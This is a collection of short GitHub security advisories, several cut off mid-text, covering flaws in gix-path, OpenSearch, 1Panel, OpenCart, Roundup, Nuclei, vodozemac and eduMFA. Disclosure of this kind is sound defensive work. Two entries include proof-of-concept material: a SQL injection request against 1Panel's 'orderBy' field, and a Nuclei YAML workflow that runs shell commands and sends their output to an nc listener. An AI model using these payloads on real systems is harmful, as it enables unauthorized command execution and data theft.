ghsa

### Summary When looking for Git for Windows so it can run it to report its paths, `gix-path` can be tricked into running another `git.exe` placed in an untrusted location by a limited user account. ### Details Windows permits limited user accounts without administrative privileges to create new directories in the root of the system drive. While `gix-path` first looks for `git` using a `PATH` search, in version 0.10.8 it also has a fallback strategy on Windows of checking two hard-coded paths intended to be the 64-bit and 32-bit Program Files directories: https://github.com/Byron/gitoxide/blob/6cd8b4665bb7582f744c3244abaef812be39ec35/gix-path/src/env/git.rs#L9-L14 Existing functions, as well as the newly introduced `exe_invocation` function, were updated to make use of these alternative locations. This causes facilities in `gix_path::env` to directly execute `git.exe` in those locations, as well as to return its path or whatever configuration it reports to callers who rely on it. ...

### Summary An issue in the OpenSearch reporting plugin allows unintended access to private tenant resources like notebooks. The system did not properly check if the user was the resource author when accessing resources in a private tenant, leading to potential data being revealed. ### Impact The lack of proper access control validation for private tenant resources in the OpenSearch observability and reporting plugins can lead to unintended data access. If an authorized user with observability or reporting roles is aware of another user's private tenant resource ID, such as a notebook, they can potentially read, modify, or take ownership of that resource, despite not being the original author, thus impacting the confidentiality and integrity of private tenant resources. The impact is confined to private tenant resources, where authorized users may gain inappropriate visibility into data intended to be private from other users within the same OpenSearch instance, potentially violatin...

### Summary There are many sql injections in the project, and some of them are not well filtered, leading to arbitrary file writes, and ultimately leading to RCEs. The proof is as follows ### Details （one of them ） <img width="697" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/895b7b43-9bc0-44b3-9c84-24c2dcc962da"> <img width="936" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/1b8eb866-9865-4bef-a359-53335d709157"> <img width="684" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/e865d6d0-7ecb-49f7-b4a2-f1b0bc407986"> ### PoC curl 'http://api:30455/api/v1/hosts/command/search' {"page":1,"pageSize":10,"groupID":0,"orderBy":"**3**","order":"ascending","name":"a"} <img width="664" alt="image" src="https://github.com/1Panel-dev/1Panel/assets/129351704/250d5a2a-cb32-44dc-9831-86dbc2f2b43f"> for example as picture . just change orderby‘s num we can know How many columns does the data table have.Parameters require stri...

A Server-Side Template Injection (SSTI) vulnerability in the edit theme function of openCart project v4.0.2.3 allows attackers to execute arbitrary code via injecting a crafted payload.

Roundup before 2.4.0 allows XSS via JavaScript in PDF, XML, and SVG documents.

Roundup before 2.4.0 allows XSS via a SCRIPT element in an HTTP Referer header.

In Roundup before 2.4.0, classhelpers (_generic.help.html) allow XSS.

### Summary Find a way to execute code template without -code option and signature. ### Details write a `code.yaml`: ```yaml id: code info: name: example code template author: ovi3 code: - engine: - sh - bash source: | id http: - raw: - | POST /re HTTP/1.1 Host: {{Hostname}} {{code_response}} workflows: - matchers: - name: t ``` using nc to listen on 80: ```bash nc -lvvnp 80 ``` execute PoC template with nuclei: ```bash ./nuclei -disable-update-check -w code.yaml -u http://127.0.0.1 -vv -debug ``` and nc will get `id` command output. We use `-w` to specify a workflow file, not `-t` to template file. and notice there is a `workflows` field in code.yaml to pretend to be a workflow file. Test in Linux and Nuclei v3.2.9 ### Impact Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web ...

Versions before 0.7.0 of vodozemac use a non-constant time base64 implementation for importing key material for Megolm group sessions and `PkDecryption` Ed25519 secret keys. This flaw might allow an attacker to infer some information about the secret key material through a side-channel attack. ### Impact The use of a non-constant time base64 implementation might allow an attacker to observe timing variations in the encoding and decoding operations of the secret key material. This could potentially provide insights into the underlying secret key material. The impact of this vulnerability is considered low because exploiting the attacker is required to have access to high precision timing measurements, as well as repeated access to the base64 encoding or decoding processes. Additionally, the estimated leakage amount is bounded and low according to the referenced paper. ### Patches The patch is in commit 734b6c6948d4b2bdee3dd8b4efa591d93a61d272. ### Workarounds None. ### Reference...

### Summary BlastRADIUS (see blastradius.fail for details) also affects eduMFA prior version 2.2.0, because the Message-Authenticator attributes were not checked. ### Details Website with the vulnerability information blastradius.fail The original vulnerability has been assigned CVE-2024-3596 Case in vince: https://kb.cert.org/vuls/id/456537 ### PoC There is no known proof-of-concept except for the attack shown in the paper from the researchers ### Impact An attacker can trigger an authentication flow with a RADIUS-backed token, intercept the RADIUS packet sent by eduMFA and modify the RADIUS server's answer, which would lead eduMFA to believe that the token is valid, even though the RADIUS servers answer was a reject.